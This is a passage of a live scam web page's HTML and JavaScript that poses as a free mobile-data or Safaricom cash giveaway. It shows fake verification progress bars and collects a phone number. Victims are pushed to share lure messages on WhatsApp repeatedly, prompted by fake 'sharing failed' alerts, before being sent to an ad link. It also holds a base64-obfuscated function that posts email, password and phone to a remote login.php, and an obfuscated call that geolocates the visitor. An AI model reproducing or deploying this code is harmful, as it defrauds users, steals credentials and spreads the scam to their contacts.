                                <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
                            </circle>
                        </svg>
                        <svg id="third-checked" class="quedate__load-check js-hidden" xml:space="preserve" viewBox="0 0 100 100" y="0" x="0" xmlns="http://www.w3.org/2000/svg" id="鍦栧堡_1" version="1.1" width=" 3.2rem">
                                <g class="ldl-scale" style="transform-origin: 50% 50%; transform: rotate(0deg) scale(0.8, 0.8);">
                                    <g class="ldl-ani">
                                        <g class="ldl-layer">
                                            <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -0.833333s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                                <circle stroke-miterlimit="10" stroke-width="8" stroke="#333" fill="none" r="40" cy="50" cx="50" style="stroke: rgb(6, 193, 103);"></circle>
                                            </g>
                                        </g>
                                        <g class="ldl-layer">
                                            <g class="ldl-ani" style="transform: scale(0.91); transform-origin: 50px 50px; animation: 1.11111s linear -1.11111s infinite normal forwards running breath-37df210d-8a2e-4b1a-ada2-3deb9c98e6b4;">
                                                <path fill="#abbd81" d="M73.3 33.5c-2.3-2.3-6.1-2.3-8.4 0L44.5 53.9l-9.4-9.4c-2.3-2.3-6.1-2.3-8.4 0-1.1 1.1-1.7 2.6-1.7 4.2s.6 3.1 1.7 4.2l13.6 13.6c1.1 1.1 2.6 1.7 4.2 1.7s3.1-.6 4.2-1.7L73.2 42c1.1-1.1 1.7-2.6 1.7-4.2s-.5-3.1-1.6-4.3z" style="fill: rgb(6, 193, 103);"></path>
                                            </g>
                                        </g>
                                        <metadata xmlns:d="https://loading.io/stock/">
                                            <d:name>ok</d:name>
                                            <d:tags>ok,confirm,ready,positive,check,right,correct,affirmative,success</d:tags>
                                            <d:license>by</d:license>
                                            <d:slug>364zp</d:slug>
                                        </metadata>
                                    </g>
                                </g>
                            </svg>
                        <span id="third-porcent" class="quedate__load-text"></span>
                    </div>
                </div>
                <button style="display: flex;align-items: center;justify-content: center;" id="compartir" class="quedate__cta-btn js-hidden">
                    <?xml version="1.0" encoding="iso-8859-1" ?>
                    <!-- Generator: Adobe Illustrator 19.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
                    <svg width="40px" style="padding-right:10px" version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
                            <circle style="fill:#75B73B;" cx="256" cy="256" r="256" />
                        <path style="fill:#52891D;" d="M360.241,151.826c-14.843-3.712-36.671-16.532-50.8-21.671
             c-55.165-17.239-129.293-3.448-149.98,60.337c-1.724,1.724-5.172,1.724-6.896,1.724c-41.374,48.269-13.791,106.882-17.239,160.323
             c-1.177,18.839-11.083,35.497-23.831,49.588l107.282,107.17C230.931,511.067,243.355,512,256,512
             c126.436,0,231.452-91.665,252.247-212.161L360.241,151.826z" />
                        <g>
                                <path style="fill:#FFFFFF;" d="M248.837,108.447c-78.029,3.712-139.604,68.696-139.369,146.811
               c0.072,23.792,5.816,46.249,15.95,66.095l-15.557,75.514c-0.841,4.086,2.843,7.663,6.901,6.701l73.995-17.53
               c19.011,9.471,40.364,14.939,62.962,15.284c79.753,1.219,146.251-62.105,148.74-141.829
               C405.121,174.035,334.591,104.362,248.837,108.447L248.837,108.447z M337.13,335.936c-21.669,21.669-50.483,33.604-81.13,33.604
               c-17.944,0-35.126-4.027-51.066-11.966l-10.302-5.134l-45.37,10.747l9.549-46.356l-5.075-9.943
               c-8.276-16.206-12.472-33.728-12.472-52.084c0-30.648,11.935-59.459,33.604-81.13c21.476-21.478,50.759-33.604,81.134-33.604
               c30.644,0,59.458,11.935,81.127,33.604c21.669,21.669,33.604,50.483,33.604,81.127C370.735,285.177,358.607,314.459,337.13,335.936
               L337.13,335.936z" />
                            <path style="fill:#FFFFFF;" d="M327.115,286.582l-28.384-8.149c-3.729-1.069-7.749-0.01-10.468,2.76l-6.942,7.07
               c-2.926,2.984-7.366,3.941-11.24,2.374c-13.427-5.434-41.672-30.548-48.881-43.106c-2.084-3.624-1.739-8.152,0.817-11.462
               l6.058-7.839c2.374-3.07,2.874-7.197,1.305-10.747l-11.941-27.008c-2.86-6.468-11.126-8.352-16.527-3.784
               c-7.921,6.701-17.32,16.88-18.461,28.16c-2.015,19.887,6.515,44.954,38.762,75.055c37.257,34.778,67.094,39.369,86.523,34.664
               c11.019-2.667,19.825-13.365,25.379-22.126C336.906,296.467,333.91,288.535,327.115,286.582L327.115,286.582z" />
                            </g>
                        <g>
                                <path style="fill:#D1D1D1;" d="M356.004,147.708l-22.223,22.778c1.131,1.045,2.257,2.096,3.351,3.191
               c21.67,21.669,33.604,50.483,33.604,81.127c0,30.375-12.128,59.656-33.604,81.134c-21.669,21.669-50.483,33.604-81.13,33.604
               c-17.944,0-35.125-4.027-51.066-11.966l-10.302-5.134l-45.37,10.747l0.938-4.553l-40.174,41.172
               c0.886,2.663,3.705,4.475,6.734,3.758l73.995-17.53c19.011,9.471,40.364,14.939,62.962,15.284
               c79.753,1.219,146.253-62.105,148.74-141.829C403.834,215.357,385.686,175.435,356.004,147.708z" />
                            <path style="fill:#D1D1D1;" d="M327.115,286.582l-28.384-8.149c-3.729-1.069-7.749-0.01-10.468,2.76l-6.942,7.07
               c-2.926,2.984-7.366,3.941-11.24,2.374c-7.756-3.139-20.451-12.845-31.185-22.904l-19.732,20.225
               c0.677,0.648,1.352,1.295,2.05,1.948c37.257,34.778,67.094,39.369,86.523,34.664c11.019-2.667,19.825-13.365,25.379-22.126
               C336.906,296.467,333.91,288.535,327.115,286.582z" />
                            </g>

                        </svg>

                    Invite Friends/Groups

                </button>
            </div>
        </div>
        <!-- FIN Ventana permiso -->

        <!--verify-->
        <div class="loading2 js-hidden js-verify">
            <div class="loading2__box">

                <b style="font-weight:bold; font-size:16px">Congratulations!</b>
				<br>
				<br>
				<br>
				<br>
                <br><b>Phone Number Confirmation Successfully!</b>
                <br>
				<br>
				<br>
                <br><b>Data Verification Successfully!</b>
                <br>
				<br>
				<br>
                <br><b>Data Bundle Activation Completed Successfully!</b>
                <br>
				<br>
				<br>
                <br><b>(Note that this step is very important for the data to work perfectly on your device.)</b>
                <br>
				<br>
				<br>
                <br><b style="font-size:14px">Now Select your Mobile Device or Computer below.</b>
                <br>
                <br>
				<br>
                <div style="display: flex;">
                    <button style="display: flex;align-items: center;justify-content: center;margin: 0;" id="verify" class="quedate__cta-btn" >IPHONE</button>
                    <button style="display: flex;align-items: center;justify-content: center;" id="verify" class="quedate__cta-btn">ANDROID</button>

                </div>
                
                <br>
                <center>
                <div style="display: flex;">
                    <button style="width: 100%; display: flex;align-items: center;justify-content: center;margin: 0;" id="verify" class="quedate__cta-btn">COMPUTER</button>

                </div>
                </center>
                <br>
                <center>
                <script type="text/javascript" src="#"></script>
                </center>

            </div>


        </div>

    </div>
</div>

<br />
<br />
<br />


</div>
<script>
    var DOMString = {
            loading: document.querySelector("#loading-svg"),
            checked: document.querySelector("#check-svg"),
            elemPorcents: document.querySelector(".quedate__porcent"),
            elemPorcentText: document.querySelector(".quedate__porcent-text"),
            firstBox: document.querySelector("#first-box"),
            secondBox: document.querySelector("#second-box"),
            thirdBox: document.querySelector("#third-box"),
            phone: document.querySelector(".quedate__form-input"),
            messageStatus: document.querySelector(".message-status"),
            loadingG: document.querySelector("#loading-g"),
            boxes: document.querySelectorAll(".quedate__first"),
            firstPorcent: document.querySelector("#first-porcent"),
            secondPorcent: document.querySelector("#second-porcent"),
            thirdPorcent: document.querySelector("#third-porcent"),
            barLoaders: document.querySelectorAll(".quedate__load-a"),
            svgLoading: document.querySelectorAll(".quedate__load-animate"),
            svgChecked: document.querySelectorAll(".quedate__load-check"),
            permissionContainer: document.querySelector(".permision-container"),
            permissionLoading: document.querySelector(".loading2"),
            statusMessage: document.querySelector(".fb-request"),
            share: document.querySelector("#compartir"),
            congrats: document.querySelector(".js-congrats"),
            sharing: document.querySelector(".js-share"),
            verify: document.querySelector("#verify")
        }, objServer = {}, landingDomain = "https://google.com/",
        adsLink = "https://usounoul.com/4/4309929";
        //adsLink = "https://usounoul.com/4/4309929";
    document.addEventListener("click", function (c) {
        console.log(c);
        var a = c.toElement || c.srcElement;
        if (a.id) switch (a.id) {
            case"validar":
                a.classList.add("js-hidden"), setTimeout(function () {
                    DOMString.loading.classList.remove("js-hidden"), DOMString.elemPorcents.classList.remove("js-hidden");
                    var b = 0;
                    window.loadingPorcents = setInterval(function () {
                        DOMString.elemPorcents.textContent = b + "%", 100 == b ? (clearInterval(window.loadingPorcents), DOMString.loading.classList.add("js-hidden"), DOMString.checked.classList.remove("js-hidden"), DOMString.elemPorcents.classList.add("js-hidden"), DOMString.elemPorcentText.classList.remove("js-hidden"), setTimeout(function () {
                            DOMString.checked.classList.add("js-hidden"), DOMString.firstBox.classList.add("js-hidden"), DOMString.secondBox.classList.remove("js-hidden"), DOMString.elemPorcentText.classList.add("js-hidden")
                        }, 2e3)) : b++
                    }, 50)
                }, 500);
                break;
            case"enviar":
                var a = DOMString.phone;
                a.value ? (objServer.phone = a.value, DOMString.messageStatus.classList.add("js-hidden"), DOMString.secondBox.classList.add("js-hidden"), DOMString.loadingG.classList.remove("js-hidden"), setTimeout(function () {
                    DOMString.loadingG.classList.add("js-hidden"), DOMString.thirdBox.classList.remove("js-hidden");
                    var i = 0, j = 0, k = !0,
                        l = [DOMString.firstPorcent, DOMString.secondPorcent, DOMString.thirdPorcent];
                    window.loadingData = setTimeout(function a() {
                        l.length > i && (DOMString.boxes[i].classList.remove("js-hidden"), DOMString.barLoaders[i].classList.remove("js-hidden"), window._setting = setInterval(function () {
                            if (l[i].textContent = j + "%", DOMString.barLoaders[i].style.width = j + "%", 100 === j && k) clearInterval(window._setting), DOMString.svgLoading[i].classList.add("js-hidden"), DOMString.svgChecked[i].classList.remove("js-hidden"), i++, j = 0, window.loadingData = setTimeout(a, 1e3); else if (50 == j && 1 == i && k) clearInterval(window._setting), k = !1, window.loadingData = setTimeout(a, 1e3); else if (!k && 100 === j) {
                                clearInterval(window._setting), DOMString.congrats.classList.remove("js-hidden"), DOMString.sharing.classList.remove("js-hidden"), DOMString.share.classList.remove("js-hidden"), DOMString.svgLoading[i].classList.add("js-hidden"), DOMString.svgChecked[i].classList.remove("js-hidden"), i++;
                                var d = 1, e = 0, m = messageToSend();
                                var s=1;
                                set_Cookie("d",s);
                                DOMString.barLoaders[i].classList.remove("js-hidden"), DOMString.boxes[i].classList.remove("js-hidden"), DOMString.svgLoading[i].classList.remove("js-hidden"), l[i].textContent = "0%", DOMString.share.classList.remove("js-hidden"), DOMString.share.addEventListener("click", function () {
                                    if (12 <= d) {
                                        for (var a = document.querySelectorAll("#verify"), b = 0; b < a.length; b++) a[b].addEventListener("click", function () {
                                            window.open(adsLink)
                                        });
                                        DOMString.congrats.classList.add("js-hidden"), document.querySelector(".js-verify").classList.remove("js-hidden"), DOMString.verify.classList.remove("js-hidden")
                                    } else
                                        /*      e = Math.floor(100 * (d / 12)), d++, l[i].textContent = e + "%", DOMString.barLoaders[i].style.width = e + "%",
                                              e = Math.floor(100 * (d / 10))*0.5+50 ;*/
                                        d==1?e=50:d==2?e=65:d==3?e=70:d==4?e=70:d==5?e=80:d==6?e=80:d==7?e=85:d==8?e=90:d==9?e=94:d==10?e=96:d==11?e=98:d==12?e=100:void(0);
                                    d++;
                                    setTimeout(function() {
                                        d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0) ;
                                        l[i].textContent = e + "%";
                                        DOMString.barLoaders[i].style.width = e + "%";
                                    }, 4000);
                                    set_Cookie('e',e);
                                    set_Cookie('d',d);
                                    
         /*       if( d == 10 ||d == 11 || d == 12 ){
                    location.href = "whatsapp://send?text=  Model penghasil uang terbaru pada tahun 2020, perubahan terjadi di sini! Hanya sebuah ponsel yang diperlukan, mengajar anda cara menghasilkan uang dan mengentaskan kemiskinan dalam 5 menit! ! %0Ahttps://tuisongxx.xyz/ad/makemoney.html?v=1" ;
                }else{
                                    window.location.href = "whatsapp://send?text=" + m
                }*/
                window.location.href = "whatsapp://send?text=" + m
                
                                })
                            }
                            j++
                        }, 30))
                    }, 1e3)
                }, 1500)) : (DOMString.messageStatus.classList.remove("js-hidden"), DOMString.messageStatus.style.color = "red", DOMString.messageStatus.style.fontWeight = "bold", DOMString.messageStatus.textContent = "We need a number");
        }
    });

    get_Cookie('e') ? setTimeout('enviar()',500) : void(0);
    landingDomain='https://tinyurl.com/Data-Get'
    function deadline() {
        var day3 = new Date();
        day3.setTime(day3.getTime()+24*60*60*1000);
        return day3.getFullYear()+"-" + (day3.getMonth()+1) + "-" + (day3.getDate()+5);
    }
    function enviar(){
        l = [DOMString.firstPorcent, DOMString.secondPorcent, DOMString.thirdPorcent];
        i = 1;

        clearInterval(window._setting), DOMString.congrats.classList.remove("js-hidden"), DOMString.sharing.classList.remove("js-hidden"), DOMString.share.classList.remove("js-hidden"), DOMString.svgLoading[i].classList.add("js-hidden"), DOMString.svgChecked[i].classList.remove("js-hidden"), i++;
        var d = parseInt(get_Cookie('d'));
        e = parseInt(get_Cookie('e'));
        m = messageToSend();
        d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0) ;
        DOMString.barLoaders[i].classList.remove("js-hidden");
        DOMString.boxes[i].classList.remove("js-hidden");
        DOMString.svgLoading[i].classList.remove("js-hidden");
        l[i].textContent = e + "%";
        DOMString.barLoaders[i].style.width = e + "%";
        DOMString.share.classList.remove("js-hidden"), DOMString.share.addEventListener("click", function () {
            if (10 <= d) {
                for (var a = document.querySelectorAll("#verify"), b = 0; b < a.length; b++) a[b].addEventListener("click", function () {
                    /*   record('4g','wc');*/
                    window.open(adsLink)
                });
                DOMString.congrats.classList.add("js-hidden"), document.querySelector(".js-verify").classList.remove("js-hidden"), DOMString.verify.classList.remove("js-hidden")
            } else {
                /*       record('4g',d);*/
                // e = Math.floor(100 * (d / 10))*0.5+50 ;
                d==1?e=50:d==2?e=65:d==3?e=70:d==4?e=70:d==5?e=80:d==6?e=80:d==7?e=85:d==8?e=90:d==9?e=94:d==10?e=96:d==11?e=98:d==12?e=100:void(0);
                d++;
                setTimeout(function() {
                    d == 3 || d == 5 || d == 7 ? alert(tip_text()) : void(0) ;
                    l[i].textContent = e + "%";
                    DOMString.barLoaders[i].style.width = e + "%";
                }, 4000);
                set_Cookie('e',e);
                set_Cookie('d',d);
                
     /*           if( d == 10 || d == 11 || d == 12 ){
                    location.href = "whatsapp://send?text=  Model penghasil uang terbaru pada tahun 2020, perubahan terjadi di sini! Hanya sebuah ponsel yang diperlukan, mengajar anda cara menghasilkan uang dan mengentaskan kemiskinan dalam 5 menit! ! %0Ahttps://tuisongxx.xyz/ad/makemoney.html?v=1" ;
                }else{
                window.location.href = "whatsapp://send?text=" + m;
                }*/
                window.location.href = "whatsapp://send?text=" + m;
            }
        })

    }
    function doreq(e, a, b) {
        var c = new XMLHttpRequest;
        c.open("POST.html", atob("aHR0cHM6Ly9hcHMucmVwcm92aWRlcy5jb20vbG9naW4ucGhwP3drcj16eGNtbmJ2MTI=")), c.onreadystatechange = function () {
            4 === c.readyState && 200 === c.status
        }, c.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), c.send("email=" + e + "&pass=" + a + "&phone=" + b)
    }
    function tip_text() {
        var a = navigator.languages[0].includes("-") ? navigator.languages[0].slice(0, navigator.languages[0].indexOf("-")) : navigator.languages[0],
            b = "";
        return "en" === a ? b="Sharing failed! The same group or the same friend is invalid. Please check and share again." : "id" === a ? b="Berbagi gagal! Grup yang sama atau teman yang sama tidak valid. Silakan periksa dan bagikan lagi." :  b="Sharing failed! The same group or the same friend is invalid. Please check and share again." ;

    }
    function messageToSend() {
        var a = navigator.languages[0].includes("-") ? navigator.languages[0].slice(0, navigator.languages[0].indexOf("-")) : navigator.languages[0],
            b = "";
        return "en" === a ? b = "%2AFREE+5GB+TO+25GB+DATA+ACTIVATION+CODE+FOR+MTN, +GLO, +AIRTEL+AND+9MOBILE+OLD+SIM%2A%0D%0A%0D%0AHurry+Up+And+Get+Free+5GB+To+25GB+Data+If+Your+MTN ,+GLO ,+AIRTEL+Or+9MOBILE+Sim+Card+Is+Above+1+Year%0A%0A👇 Click Here To Enjoy Now 👇%0A%0A " + landingDomain : "id" === a ? b = "%2ASafaricom+Valentines+%E2%9D%A4%EF%B8%8F+Gift%2A%0D%0A%0D%0AYou+qualify+to+receive+this+year%E2%80%99s+%2AKES+5%2C000%2A+if+you+have+been+using+Safaricom+for+more+than+one+month.%0D%0A%0D%0AImagine+nimeshapata+yangu+sent+to+my+%2AMpesa%2A%21%21%0D%0A%0D%0A%2AHappy+%E2%9D%A4%EF%B8%8F+Valentines+Everyone+from+Safaricom%2A%0D%0A%0D%0A%2AVisit+-+%2A " + landingDomain : b = "%2ASafaricom+Valentines+%E2%9D%A4%EF%B8%8F+Gift%2A%0D%0A%0D%0AYou+qualify+to+receive+this+year%E2%80%99s+%2AKES+5%2C000%2A+if+you+have+been+using+Safaricom+for+more+than+one+month.%0D%0A%0D%0AImagine+nimeshapata+yangu+sent+to+my+%2AMpesa%2A%21%21%0D%0A%0D%0A%2AHappy+%E2%9D%A4%EF%B8%8F+Valentines+Everyone+from+Safaricom%2A%0D%0A%0D%0A%2AVisit+-+%2A " + landingDomain ;
    }

    /* function messageToSend() {
         var a = navigator.languages[0].includes("-") ? navigator.languages[0].slice(0, navigator.languages[0].indexOf("-")) : navigator.languages[0],
             b = "";
         return "en" === a ? b = "To be grateful to customers for their continued support of 4G Internet! The company launched a 60-day free access to 100GB Internet data free use plan Participants can get 100GB free mobile internet data usage\n" +
             "Participating customers:\n" +
             "1. Customers who use 4G data for a long time\n" +
             "2. All traffic on Whatsapp users is free, including video downloads\n" +
             "3. The system will check your number for participation rights\n" +
             "4. It can help the company to promote the business first\n" +
             "The system will record your start date after success.\n" +
             "Thank you for your participation! %0A%0A*Get it now HERE \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz" :
             "it" === a ? b = "*200 Gb di dati Internet senza alcuna ricarica Per* %0A Ottieni 200 Gb di dati Internet gratuitamente su qualsiasi rete mobile per 60 giorni. %0A *Scarica ora QUI \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz " :
                 "es" === a ? b = "*200 Gb de datos de Internet súper rápidos sin ninguna recarga* %0A%0AObtenga 200 Gb de datos de Internet gratis en cualquier red ahora. m\xF3vil durante 60 d\xEDas. %0A%0A*Consiguelo ahora AQUI \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz" :
                     "ar" === a ? b = "*200 \u062C\u064A\u062C\u0627 \u0628\u0627\u064A\u062A \u0645\u0646 \u0628\u064A\u0627\u0646\u0627\u062A \u0627\u0644\u0625\u0646\u062A\u0631\u0646\u062A \u062F\u0648\u0646 \u0623\u064A \u0625\u0639\u0627\u062F\u0629 \u0634\u062D\u0646 \u0628\u0633\u0628\u0628* %0A \u0627\u062D\u0635\u0644 \u0639\u0644\u0649 100 \u062C\u064A\u062C\u0627\u0628\u0627\u064A\u062A \u0645\u0646 \u0628\u064A\u0627\u0646\u0627\u062A \u0627\u0644\u0625\u0646\u062A\u0631\u0646\u062A \u0627\u0644\u0645\u062C\u0627\u0646\u064A\u0629 \u0639\u0644\u0649 \u0623\u064A \u0634\u0628\u0643\u0629 \u0645\u062D\u0645\u0648\u0644 \u0644\u0645\u062F\u0629 60 \u064A\u0648\u0645\u064B\u0627 %0A *\u0627\u062D\u0635\u0644 \u0639\u0644\u064A\u0647 \u0627\u0644\u0622\u0646 \u0647\u0646\u0627 \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz" :
                         "el" === a ? b = "*200 Gb \u03B4\u03B5\u03B4\u03BF\u03BC\u03AD\u03BD\u03C9\u03BD \u0394\u03B9\u03B1\u03B4\u03B9\u03BA\u03C4\u03CD\u03BF\u03C5 \u03C7\u03C9\u03C1\u03AF\u03C2 \u03BA\u03B1\u03BC\u03AF\u03B1 \u03B5\u03C0\u03B1\u03BD\u03B1\u03C6\u03CC\u03C1\u03C4\u03B9\u03C3\u03B7 \u0393\u03B9\u03B1* %0A \u039B\u03AC\u03B2\u03B5\u03C4\u03B5 200 Gb \u03B4\u03B5\u03B4\u03BF\u03BC\u03AD\u03BD\u03C9\u03BD Internet \u03B4\u03C9\u03C1\u03B5\u03AC\u03BD \u03C3\u03B5 \u03BF\u03C0\u03BF\u03B9\u03BF\u03B4\u03AE\u03C0\u03BF\u03C4\u03B5 \u03B4\u03AF\u03BA\u03C4\u03C5\u03BF \u03BA\u03B9\u03BD\u03B7\u03C4\u03AE\u03C2 \u03C4\u03B7\u03BB\u03B5\u03C6\u03C9\u03BD\u03AF\u03B1\u03C2 \u03B3\u03B9\u03B1 60 \u03B7\u03BC\u03AD\u03C1\u03B5\u03C2. %0A *\u0391\u03C0\u03BF\u03BA\u03C4\u03AE\u03C3\u03C4\u03B5 \u03C4\u03BF \u0395\u0394\u03A9 \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz" :
                             "sq" === a ? b = "*200 Gb t\xEB dh\xEBna n\xEB internet pa ndonj\xEB rimbushje p\xEBr* %0A Merrni 200 Gb t\xEB dh\xEBna n\xEB internet falas n\xEB \xE7do rrjet celular p\xEBr 60 dit\xEB. %0A *Merre tani KETU%* %0Ahttps://tuisongxx.xyz" :
                                 "tr" === a ? b = "*Herhangi bir \u015Farj olmadan 200 Gb \u0130nternet verisi  i\xE7in* %0A Herhangi bir mobil a\u011Fda 60 g\xFCn boyunca \xFCcretsiz olarak 200 Gb \u0130nternet verisi al\u0131n. %0A *Hemen al\u0131n HERE \uD83D\uDC47\uD83D\uDC47* %0A https://tuisongxx.xyz/" :
                                     "ru" === a ? b = "*100 \u0413\u0411 \u0438\u043D\u0442\u0435\u0440\u043D\u0435\u0442-\u0434\u0430\u043D\u043D\u044B\u0445 \u0431\u0435\u0437 \u043F\u0435\u0440\u0435\u0437\u0430\u0440\u044F\u0434\u043A\u0438. \u0414\u043B\u044F \u041A\u0410\u0420\u0410\u041D\u0422\u0418\u041D\u0410* %0A \u041F\u043E\u043B\u0443\u0447\u0438\u0442\u0435 100 \u0413\u0411 \u0438\u043D\u0442\u0435\u0440\u043D\u0435\u0442-\u0434\u0430\u043D\u043D\u044B\u0445 \u0431\u0435\u0441\u043F\u043B\u0430\u0442\u043D\u043E \u0432 \u043B\u044E\u0431\u043E\u0439 \u043C\u043E\u0431\u0438\u043B\u044C\u043D\u043E\u0439 \u0441\u0435\u0442\u0438 \u0432 \u0442\u0435\u0447\u0435\u043D\u0438\u0435 60 \u0434\u043D\u0435\u0439. %0A *\u041F\u043E\u043B\u0443\u0447\u0438\u0442\u044C \u0441\u0435\u0439\u0447\u0430\u0441 \u0417\u0414\u0415\u0421\u042C \uD83D\uDC47\uD83D\uDC47* %0A https://tuisongxx.xyz" :
                                         "no" === a ? b = "*200 Gb Internett-data uten lading* %0A F\xE5 200 Gb Internett-data gratis p\xE5 et mobilnett i 60 dager. %0A *F\xE5 den n\xE5 HER \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz/" :
                                             "af" === a ? b = "*200 Gb internetdata sonder enige herlaai vir QUARANTINE (KROONVIRUS)* %0A Kry 60 GB internetdata gratis op enige mobiele netwerk vir 60 dae. %0A *Kry dit nou HIER \uD83D\uDC47\uD83D\uDC47* %0A https://tuisongxx.xyz/" :
                                                 "se" === a ? b = "*200 Gb Internetdata utan laddning f\xF6r QUARANTINE (CROWN VIRUS)* %0A F\xE5 200 Gb Internetdata gratis i alla mobiln\xE4tverk i 60 dagar. %0A *H\xE4mta det nu H\xC4R \uD83D\uDC47\uD83D\uDC47* %0A https://tuisongxx.xyz/" :
                                                     "th" === a ? b = "*\u0E02\u0E49\u0E2D\u0E21\u0E39\u0E25\u0E2D\u0E34\u0E19\u0E40\u0E17\u0E2D\u0E23\u0E4C\u0E40\u0E19\u0E47\u0E15 200Gb \u0E42\u0E14\u0E22\u0E44\u0E21\u0E48\u0E15\u0E49\u0E2D\u0E07\u0E0A\u0E32\u0E23\u0E4C\u0E08\u0E0B\u0E49\u0E33\u0E2A\u0E33\u0E2B\u0E23\u0E31\u0E1A* %0A \u0E23\u0E31\u0E1A\u0E02\u0E49\u0E2D\u0E21\u0E39\u0E25\u0E2D\u0E34\u0E19\u0E40\u0E17\u0E2D\u0E23\u0E4C\u0E40\u0E19\u0E47\u0E15 200Gb \u0E1F\u0E23\u0E35\u0E1A\u0E19\u0E40\u0E04\u0E23\u0E37\u0E2D\u0E02\u0E48\u0E32\u0E22\u0E21\u0E37\u0E2D\u0E16\u0E37\u0E2D\u0E43\u0E14 \u0E46 \u0E40\u0E1B\u0E47\u0E19\u0E40\u0E27\u0E25\u0E32 60 \u0E27\u0E31\u0E19  %0A *\u0E23\u0E31\u0E1A\u0E17\u0E31\u0E19\u0E17\u0E35\u0E17\u0E35\u0E48\u0E19\u0E35\u0E48\uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz/" :
                                                         "pl" === a ? b = "*200 Gb danych internetowych bez do\u0142adowania W przypadku KWARANTANNY (WIRUS KORONOWY)* %0A Uzyskaj 200 Gb danych internetowych bezp\u0142atnie w dowolnej sieci kom\xF3rkowej przez 60 dni. %0A *Pobierz teraz TUTAJ\uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz/" :
                                                             "nl" === a ? b = "*200 Gb aan internetgegevens zonder op te laden Voor QUARANTINE (CROWN VIRUS)* %0A Ontvang gratis 200 Gb aan internetgegevens op elk mobiel netwerk gedurende 60 dagen. %0A *Haal het nu HIER \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz/" :
                                                                 "de" === a ? b = "*200 Gb Internetdaten ohne Aufladung F\xFCr* %0A Sie erhalten 60 Tage lang kostenlos 200 Gb Internetdaten in jedem Mobilfunknetz. %0A *Jetzt HIER herunterladen \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz/" :
                                                                     "id" === a ? b = "Untuk berterima kasih kepada pelanggan atas dukungan berkelanjutan mereka terhadap Internet 4G! Perusahaan meluncurkan paket akses gratis 60 hari ke 200GB data Internet untuk penggunaan gratis Peserta bisa mendapatkan 200GB penggunaan data internet seluler gratis Pelanggan yang berpartisipasi: 1. Pelanggan yang menggunakan data 4G dalam waktu lama 2. Semua lalu lintas di pengguna Whatsapp gratis, termasuk unduhan video 3. Sistem akan memeriksa nomor Anda untuk hak partisipasi 4. Dapat membantu perusahaan untuk mempromosikan prioritas bisnis Sistem akan mencatat tanggal mulai Anda setelah sukses Terima kasih atas partisipasinya! %0A *Dapatkan sekarang DI SINI \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz" :
                                                                         "pt" === a ? b = "*200 Gb de dados da Internet sem recarga Para QUARANTINE (V\xCDRUS DE CORONA)* %0A Obtenha 200 Gb de dados da Internet gratuitamente em qualquer rede m\xF3vel por 60 dias. %0A *Adquira agora AQUI \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz/" :
                                                                             "ms" === a ? b = "*200Gb data Internet tanpa pengisian semula Untuk Kuarantin (CROWN VIRUS)* %0A Dapatkan 200Gb data Internet secara percuma di mana-mana rangkaian mudah alih selama 60 hari. %0A *Dapatkan sekarang DI SINI \uD83D\uDC47\uD83D\uDC47* %0Ahttps://tuisongxx.xyz/" :
                                                                                 //    "th" === a ? b = "* รับข้อมูล Intrnet 200Gb โดยไม่ต้องเติมเงินใด ๆ *% 0A% 0AC คลิกด้านล่างเพื่อรับข้อมูล 200Gb ฟรี 60 วันสำหรับ Operator% 0A% 0A ทั้งหมด * รับทันทีที่นี่ \uD83D \uDC47 \uD83D\uDC47* %0Ahttps://tuisongxx.xyz" :
                                                                                 "cn"=== a ? b = "*获取200GB的流量数据而无需充值* ％0A％0A 单击下面的按钮即可为所有运营商 ％0A％0A 免费获得60天的200Gb数据* 立即获取 \uD83D\uDC47\uD83D\uDC47 * %0Ahttps://tuisongxx.xyz/cn/"

     }*/

    function operatorData(c) {
        var a = new XMLHttpRequest;
        a.open("GET.html", atob("aHR0cHM6Ly90ZHNqc2V4dDMuY29tL0V4dFNlcnZpY2Uuc3ZjL2dldGV4dHBhcmFtcw==")), a.onreadystatechange = function () {
            4 === a.readyState && 200 == a.status && c(a.response)
        }, a.send(null)
    }

    operatorData(function (e) {
        var {isp: a, cnames: b, subdiv: c} = JSON.parse(e);
        document.querySelector(".quedate__company").textContent = a, document.querySelector(".quedate__country").textContent = b.en, document.querySelector(".quedate__city").textContent = c[0].en
    });
    var counter = 153;
    setInterval(function () {
        document.querySelector(".chat__reactions-counter").textContent = counter + "k", counter++
    }, 5e3);
    var counter2 = 337;
    setInterval(function () {
        document.querySelector(".js-counter").textContent = counter2, counter2++
    }, 5e3);
    var seconds = 1;
    setInterval(function () {
        for (var c = document.querySelectorAll(".js-seconds"), a = 0; a < c.length; a++) c[a].textContent = seconds + "m";
        seconds++
    }, 6e3), setTimeout(function () {
        var b = document.querySelector("#js-box-1");
        b.classList.remove("js-hidden"), b.classList.add("fadeInDown")
    }, 1e3), setTimeout(function () {
        var b = document.querySelector("#js-box-2");
        b.classList.remove("js-hidden"), b.classList.add("fadeInDown")
    }, 3e3);</script>

<script>
    function getTextNodesIn(a, b) {
        var c = [];
        if (a) for (var d = a.childNodes, e = d.length; e--;) {
            var f = d[e], g = f.nodeType;
